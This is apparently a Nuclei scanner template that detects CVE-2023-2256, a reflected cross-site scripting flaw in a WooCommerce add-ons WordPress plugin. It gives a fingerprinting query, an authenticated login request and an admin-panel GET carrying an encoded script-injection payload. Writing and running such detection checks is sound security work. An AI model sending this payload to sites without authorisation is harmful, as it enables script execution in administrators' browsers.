id: CVE-2023-2256 info: name: WordPress Product Addons & Fields for WooCommerce < 32.0.7 - Cross-Site Scripting author: ritikchaddha severity: high description: | The Product Addons & Fields for WooCommerce WordPress plugin before version 32.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape some URL parameters in the admin panel, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context. reference: - https://wpscan.com/vulnerability/1187e041-3be2-4613-8d56-c2394fcc75fb - https://nvd.nist.gov/vuln/detail/CVE-2023-2256 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-2256 cwe-id: CWE-79 cpe: cpe:2.3:a:themeisle:product_addons_\&_fields_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 vendor: WordPress product: woocommerce-product-addon fofa-query: body="wp-content/plugins/woocommerce-product-addon/" tags: cve,cve2023,wp,wordpress,wp-plugin,xss,woocommerce,woocommerce-product-addon,authenticated http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} redirects: true matchers: - type: word part: body words: - "woocommerce-product-addon" - "woocommerce" condition: and case-insensitive: true internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=ppom&productmeta_id=5&do_meta=edit&%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '">' - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a00473045022073afa87df786430b7b6ef7c3ca4bb74d20f34a7ba1ee486b6715ce71ef602cf8022100d48c948ed1db8efc49dd40573466c235c187cbc85d3ef17ef85f7b0d09c1713e:922c64590222798bb761d5b6d8e72950